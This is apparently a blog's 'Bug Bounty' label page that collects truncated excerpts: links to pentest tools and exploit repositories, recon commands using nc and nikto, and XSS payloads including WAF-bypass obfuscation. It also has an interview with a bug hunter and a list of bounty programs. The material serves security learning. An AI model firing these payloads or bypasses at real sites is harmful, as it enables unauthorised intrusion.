Posts

Showing posts with the label Bug Bounty

Github Projects And Bug bounty Resources

Github
https://github.com/e-ago/bitcracker
Shakaal ™: Attify OS - Distro for pentesting IoT devices
https://github.com/adi0x90/attifyos
https://github.com/frizb/OSCP-Survival-Guide/blob/master/README.md
https://github.com/Mr-Un1k0d3r/ThunderShell
Shakaal ™: https://github.com/karelorigin/XSS-Problems/blob/master/README.md
Tools for penetration testers that can enumerate which users logged on Windows systems | https://github.com/galkan/kacak
https://github.com/HSIS007/Useful_Websites_For_Pentester
[9/30, 11:12 AM] Python: https://github.com/mjain61/Lulzsec_Mailer
[9/30, 4:10 PM] Python: https://github.com/1modm/stegator
[10/2, 10:26 AM] Python: https://github.com/tbhaxor/webzipper
[10/2, 10:38 AM] Python: https://github.com/ojasookert/CVE-2017-0785
[9/28, 1:46 PM] Python: https://github.com/EdOverflow/bugbounty-cheatsheet
[9/28, 1:49 PM] Python: https://github.com/cujanovic/SSRF-Testing
[9/28, 2:03 PM] Python: https://github.com/cujanovic/Markdown-XSS-Payloads/blo

Some Private Notes on Bug Hunting

Aashish Kunvar
Anon haxo: By dorkerdevil. Hope you like it #NavinYadav bro for u n for group

Hack Notes

echo -e "HEAD / HTTP/1.0\n\n" | nc -vv website.com 80
echo -e "HEAD / HTTP/1.0\n\n" | openssl s_client -quiet -connect website:443
nikto -p 80 -h website -verbose
whisker2.1 -p 80 -h website

enum all extensions: .asp,.aspx,.css,.htc,.htr,.htw,.ida,.idc,.idq,.printer,.shtm,.xml,.xsl
previous version of pages:~ extensions: .bak,.old,.orig,.txt
search for common directories such as:~ /bak,/inc,/old,/script
SQL connection strings:~ db= dbconn=

~:xss payloads to check:~
<script>alert(document.cookie)</script>
1.attempt different embedding method: %3cscript%3e, %253cscript%253e, %00%3cscript%

Bug bounty forum

Streaak:
https://bugbountyforum.com/blog/ama/nahamsec/
https://bugbountyforum.com/blog/ama/yaworsk/
https://bugbountyforum.com/blog/ama/jstnkndy/
https://bugbountyforum.com/blog/ama/itsecurityguard/
https://bugbountyforum.com/blog/ama/avlidienbrunn/
@irPentesters

Hacking, bug bounty Material (Advance)

Web hacking bounty material

Security certification, Mexico (course)

Some XSS payloads

JuanDeLemos:

Some XSS payload starts
<!'/*!"/*!//'/*//"/*--!>
or
>');'>%>?>">">\x22\x3e/*-->]]>

<!'/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/Onfocus=confirm`1`//><Svg>

Fuck WAF
<script>a=xss<!--<script/\;</script><input value="${alert(1)}`</script/">

Fuck WAF with string obfuscation
<script>eval(ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(666));</script/">

XSS in href link
<a href="" onclick=``/name==alert(1)>clickme1</a>
or
<a href="" onclick=``/*/alt="*//alert(1)//">clickme2</a>

Rewrite page
<a href="javascript:document.write('c========3'); void(0);">Middle-click me</a>

New test
'\"--!><Body /Onpageshow=confirm`1`>
"-->'><script>alert(1);</script>"

List of different XSS Cheat

Hacker who earned 2.2 Crore (Bug hunter)

TECH INTERVIEW: This Indian Hacker Has Earned ₹2.2 Crore By Finding Bugs In Facebook, Twitter, And Other websites

Anand Prakash is planning his own cybersecurity startup.

Dungeon Masterl || Tech News Editor

ANAND PRAKASH

India has no shortage of software talent. For proof, look no further than security researcher Anand Prakash, who is in the news once again for winning a $5,000 reward from Uber after he pointed out a bug in their software that could have allowed users to take unlimited free rides.

This is not the first time that Prakash has won a reward for pointing out a security flaw in a website. Over the years, he has alerted big corporations such as Facebook, Twitter and Google about potentially expensive and risky software loopholes on their websites.

HuffPost India caught up with India's top bug bounty hunter for a chat. Here are edited excerpts from the conversation:

How did you get interested in hacking?

In 2010, I was in Kota, taking an entrance course there.

Starting Bug Bounty ? | Bug Bounty Resources

Geekboy | Security Researcher, Bug Bounty Hunter

Hey all, this post is not about any of my findings; it's about resources for bug bounty learners. No matter whether you are starting out or experienced, there is always something to learn from others. If you are just starting in bug bounty, then surely this is going to be a helpful post, and somewhat necessary, as nowadays many new people start bug bounty after seeing the $$. It's good that you want to make $$ from it, but before that you should understand the process, quality and report writing, which will help you make more $$, so it's better to understand first and then go for it.

So here I am going to add some links which have lots of info, resources and write-ups about what I was talking about before.

How to Become a Successful Bug Bounty Hunter
How to become a Bug Bounty Hunter
Bug Bounties 101
The life of a bug bounty hunter
Bounty Bug Write-ups
Facebook Bug Bounties ap

Bug Bounty Web List

What is the Bug Bounty Program?

A Bug Bounty program provides recognition and compensation to security researchers practising responsible disclosure. Companies started Bug Bounty programs to improve their security; cyber security researchers find vulnerabilities on top websites and get rewarded.

Reward Programs

AT&T – http://developer.att.com/developer/apiDetailPage.jsp?passedItemId=10700235 (To submit you need to sign up to the free Developer API program)
Avast! – http://www.avast.com/bug-bounty
Barracuda – http://barracudalabs.com/
Coinbase – https://coinbase.com/whitehat
Chromium Project – http://www.chromium.org/
CrowdShield – https://crowdshield.com/
Cryptocat – https://crypto.cat/bughunt/
Facebook – http://www.facebook.com/whitehat/
Etsy – http://www.etsy.com/help/article/2463
Gallery – http://codex.gallery2.org/Bounties
Ghostscript – http://ghostscript.com/Bug_bounty_program.html (Mostly software development, occasional security issues)
Google – http://www.google.